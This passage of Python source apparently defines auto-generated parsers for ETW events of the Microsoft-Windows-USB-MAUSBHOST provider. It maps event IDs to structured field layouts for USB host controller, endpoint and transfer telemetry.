"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=58, version=0)
class Microsoft_Windows_USB_MAUSBHOST_58_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=59, version=0)
class Microsoft_Windows_USB_MAUSBHOST_59_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul,
"fid_Size" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=60, version=0)
class Microsoft_Windows_USB_MAUSBHOST_60_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=61, version=0)
class Microsoft_Windows_USB_MAUSBHOST_61_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=62, version=0)
class Microsoft_Windows_USB_MAUSBHOST_62_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=63, version=0)
class Microsoft_Windows_USB_MAUSBHOST_63_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=64, version=0)
class Microsoft_Windows_USB_MAUSBHOST_64_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=65, version=0)
class Microsoft_Windows_USB_MAUSBHOST_65_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=66, version=0)
class Microsoft_Windows_USB_MAUSBHOST_66_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=67, version=0)
class Microsoft_Windows_USB_MAUSBHOST_67_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=70, version=0)
class Microsoft_Windows_USB_MAUSBHOST_70_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_MaUsbEndpointHandle" / Int16ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_TransferBufferLength" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=71, version=0)
class Microsoft_Windows_USB_MAUSBHOST_71_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_MaUsbEndpointHandle" / Int16ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_BytesTransferred" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=72, version=0)
class Microsoft_Windows_USB_MAUSBHOST_72_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RemainingSizeOrCredit" / Int32ul,
"fid_BytesTotal" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_FlagBitRetry" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=73, version=0)
class Microsoft_Windows_USB_MAUSBHOST_73_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_UsbTransferRequest" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_MaUsbStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=74, version=0)
class Microsoft_Windows_USB_MAUSBHOST_74_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_Length" / Int16ul,
"fid_MaUsbStatus" / Int32ul,
"fid_AckRequest" / Int8ul,
"fid_FlagBitRetry" / Int8ul,
"fid_RemainingSizeOrCredit" / Int32ul,
"fid_EndOfTransfer" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=75, version=0)
class Microsoft_Windows_USB_MAUSBHOST_75_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=76, version=0)
class Microsoft_Windows_USB_MAUSBHOST_76_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_P_Out_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=77, version=0)
class Microsoft_Windows_USB_MAUSBHOST_77_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=78, version=0)
class Microsoft_Windows_USB_MAUSBHOST_78_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Synch_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=79, version=0)
class Microsoft_Windows_USB_MAUSBHOST_79_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Container_Id_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=80, version=0)
class Microsoft_Windows_USB_MAUSBHOST_80_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Link_Sleep_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=100, version=0)
class Microsoft_Windows_USB_MAUSBHOST_100_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_Irp" / Int64ul,
"fid_IoChannelHandle" / Int64ul,
"fid_NumberOfBytes" / Int64ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=101, version=0)
class Microsoft_Windows_USB_MAUSBHOST_101_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_Irp" / Int64ul,
"fid_NumberOfBytes" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=102, version=0)
class Microsoft_Windows_USB_MAUSBHOST_102_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_IoChannelHandle" / Int64ul,
"fid_NumberOfBytes" / Int64ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=103, version=0)
class Microsoft_Windows_USB_MAUSBHOST_103_0(Etw):
pattern = Struct(
"fid_WdfRequest" / Int64ul,
"fid_NumberOfBytes" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=104, version=0)
class Microsoft_Windows_USB_MAUSBHOST_104_0(Etw):
pattern = Struct(
"fid_FdoContext" / Int64ul,
"fid_LocalAddressLength" / Int32ul,
"fid_LocalAddress" / Bytes(lambda this: this.fid_LocalAddressLength),
"fid_RemoteAddressLength" / Int32ul,
"fid_RemoteAddress" / Bytes(lambda this: this.fid_RemoteAddressLength),
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=105, version=0)
class Microsoft_Windows_USB_MAUSBHOST_105_0(Etw):
pattern = Struct(
"fid_FdoContext" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=106, version=0)
class Microsoft_Windows_USB_MAUSBHOST_106_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=108, version=0)
class Microsoft_Windows_USB_MAUSBHOST_108_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_ControllerResetReason" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=109, version=0)
class Microsoft_Windows_USB_MAUSBHOST_109_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Float32l,
"fid_IsLinkManaged" / Int8ul,
"fid_CreditConsumptionUnit" / Int16ul,
"fid_BufferSize" / Int32ul,
"fid_IsochProgrammingDelay" / Int16ul,
"fid_IsochResponseDelay" / Int16ul,
"fid_IsochSegmentsPerFrame" / Int32ul,
"fid_MaxIsochSegmentSize" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=110, version=0)
class Microsoft_Windows_USB_MAUSBHOST_110_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=111, version=0)
class Microsoft_Windows_USB_MAUSBHOST_111_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=112, version=0)
class Microsoft_Windows_USB_MAUSBHOST_112_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_TransitionType" / Int32ul,
"fid_SourceState" / Int32ul,
"fid_Event" / Int32ul,
"fid_TargetState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=113, version=0)
class Microsoft_Windows_USB_MAUSBHOST_113_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_ObjectHandle" / Int64ul,
"fid_Exception" / Int32ul,
"fid_State" / Int32ul,
"fid_Event" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=114, version=0)
class Microsoft_Windows_USB_MAUSBHOST_114_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_Length" / Int16ul,
"fid_MaUsbStatus" / Int32ul,
"fid_AckRequest" / Int8ul,
"fid_NegativeCredit" / Int8ul,
"fid_EndOfTransfer" / Int8ul,
"fid_NumberOfIsochHeaders" / Int16ul,
"fid_MTDValid" / Int8ul,
"fid_ASAPDelivery" / Int8ul,
"fid_PresentationTime" / Int32ul,
"fid_NumberOfIsochSegments" / Int16ul,
"fid_NominalBusInterval" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=115, version=0)
class Microsoft_Windows_USB_MAUSBHOST_115_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_Length" / Int16ul,
"fid_MaUsbStatus" / Int32ul,
"fid_AckRequest" / Int8ul,
"fid_NegativeCredit" / Int8ul,
"fid_EndOfTransfer" / Int8ul,
"fid_NumberOfIsochHeaders" / Int16ul,
"fid_MTDValid" / Int8ul,
"fid_ASAPDelivery" / Int8ul,
"fid_PresentationTime" / Int32ul,
"fid_NumberOfIsochSegments" / Int16ul,
"fid_NominalBusInterval" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=116, version=0)
class Microsoft_Windows_USB_MAUSBHOST_116_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_PortNumber" / Int16ul,
"fid_RemotePortNumber" / Int16ul,
"fid_IsUdp" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=117, version=0)
class Microsoft_Windows_USB_MAUSBHOST_117_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_PortNumber" / Int16ul,
"fid_RemotePortNumber" / Int16ul,
"fid_IsUdp" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=118, version=0)
class Microsoft_Windows_USB_MAUSBHOST_118_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Float32l,
"fid_IsLinkManaged" / Int8ul,
"fid_CreditConsumptionUnit" / Int16ul,
"fid_BufferSize" / Int32ul,
"fid_IsochProgrammingDelay" / Int16ul,
"fid_IsochResponseDelay" / Int16ul,
"fid_IsochSegmentsPerFrame" / Int32ul,
"fid_MaxIsochSegmentSize" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=119, version=0)
class Microsoft_Windows_USB_MAUSBHOST_119_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=120, version=0)
class Microsoft_Windows_USB_MAUSBHOST_120_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_P_Out_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=121, version=0)
class Microsoft_Windows_USB_MAUSBHOST_121_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=122, version=0)
class Microsoft_Windows_USB_MAUSBHOST_122_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Synch_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=123, version=0)
class Microsoft_Windows_USB_MAUSBHOST_123_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Container_Id_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=124, version=0)
class Microsoft_Windows_USB_MAUSBHOST_124_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Link_Sleep_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=125, version=0)
class Microsoft_Windows_USB_MAUSBHOST_125_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_NumberOfEndpoints" / Int16ul,
"fid_NumberOfDevices" / Int8ul,
"fid_NumberOfStreams" / Int8ul,
"fid_DeviceType" / Int8ul,
"fid_MaxOutstandingTransferRequests" / Int16ul,
"fid_MaxOutstandingManagementRequests" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=201, version=0)
class Microsoft_Windows_USB_MAUSBHOST_201_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_ResponseTimeout" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=202, version=0)
class Microsoft_Windows_USB_MAUSBHOST_202_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=203, version=0)
class Microsoft_Windows_USB_MAUSBHOST_203_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_RouteStringPort1" / Int8ul,
"fid_RouteStringPort2" / Int8ul,
"fid_RouteStringPort3" / Int8ul,
"fid_RouteStringPort4" / Int8ul,
"fid_RouteStringPort5" / Int8ul,
"fid_USBSpeed" / Int8ul,
"fid_HubDeviceHandle" / Int16ul,
"fid_ParentHSHubDeviceHandle" / Int16ul,
"fid_ParentHSHubPort" / Int8ul,
"fid_MTT" / Int8ul,
"fid_LaneSpeedExponent" / Int8ul,
"fid_SublinkType" / Int8ul,
"fid_LaneCount" / Int8ul,
"fid_LinkProtocol" / Int8ul,
"fid_LaneSpeedMantissa" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=204, version=0)
class Microsoft_Windows_USB_MAUSBHOST_204_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=205, version=0)
class Microsoft_Windows_USB_MAUSBHOST_205_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=206, version=0)
class Microsoft_Windows_USB_MAUSBHOST_206_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_USBDeviceHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=207, version=0)
class Microsoft_Windows_USB_MAUSBHOST_207_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=208, version=0)
class Microsoft_Windows_USB_MAUSBHOST_208_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_EP0Handle" / Int16ul,
"fid_MaxPacketSize" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=209, version=0)
class Microsoft_Windows_USB_MAUSBHOST_209_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=210, version=0)
class Microsoft_Windows_USB_MAUSBHOST_210_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesToInactivate" / Int8ul,
"fid_SuspendFlag" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=211, version=0)
class Microsoft_Windows_USB_MAUSBHOST_211_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=212, version=0)
class Microsoft_Windows_USB_MAUSBHOST_212_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_UpdateDevReqFields" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=213, version=0)
class Microsoft_Windows_USB_MAUSBHOST_213_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
